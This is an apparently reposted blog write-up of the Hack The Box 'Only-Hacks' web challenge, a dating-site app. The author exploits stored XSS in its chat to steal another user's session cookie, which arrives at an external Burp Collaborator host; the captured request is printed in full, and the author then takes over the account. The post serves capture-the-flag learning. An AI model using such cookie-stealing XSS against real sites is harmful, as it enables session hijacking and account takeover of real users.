.png)
4 hours ago
7 BOOK THIS SPACE FOR AD
ARTICLE AD
While exploring web challenges on HTB, I chose the Only-Hacks challenge. This challenge does not provide any source code files for white-box testing, so let’s begin by clicking “Start Instance” and searching for the flag
Here is the IP to hack on
94.237.54.116:34494
After opening the IP in a browser, it loaded a webpage displaying a dashboard
Most hackers would try SQL Injection here to hack the database and find the flag — I know, man. But that’s not the case this time. So, let’s go with the flow. I decided to take a different approach by signing up.
It’s a dating website similar to Tinder, where you can find your perfect match. As we can see, there’s a profile photo upload feature — I know what you hackers are thinking, trying to get an RCE and capture the flag. But again, I didn’t go that route. Instead, I simply registered an account.
You can like or dislike pictures to find your perfect match. After finishing all the pictures in the match section, I finally got a match with a girl named Renata. So, I casually started a conversation with her, and suddenly, my hacker instinct kicked in — I decided to send an XSS payload in the chat. My Burp Suite proxy was capturing every request.
I figured that if I could execute my XSS payload in her browser, I could steal her session cookies and hijack her session. So, I first sent a normal XSS payload and quickly noticed that the pop-up appeared in both her chat and mine. That confirmed the vulnerability. Then, I crafted a cookie stealer payload to steal her session cookies.
To receive the session cookies, I used Burp Collaborator. I sent the XSS payload again, and soon after, I received an HTTP request containing her session cookies
GET /?session=eyJ1c2VyIjp7ImlkIjo1LCJ1c2VybmFtZSI6Impob253aWNrIn19.Z7tEgg.82ss6aG_Y47H83tSk29y9obfTl4 HTTP/1.1Host: vqpojgfi4rntzmnyrthxz14ix930rqff.oastify.com
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://94.237.54.116:34494/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
I simply replaced my session cookies with her’s using the developer console and refreshed the page
Boom! We successfully achieved account takeover. After getting into her account, we finally found what we were looking for.
Now, we had our flag and successfully solved the challenge! I don’t know if there’s another approach to capturing the flag, but my hacker instinct led me down this path — and it worked perfectly.
Hacking isn’t just about technical skills — it’s about having a creative mind and thinking outside the box.
Thanks for reading ..
Bengali (Bangladesh) · 
English (United States) ·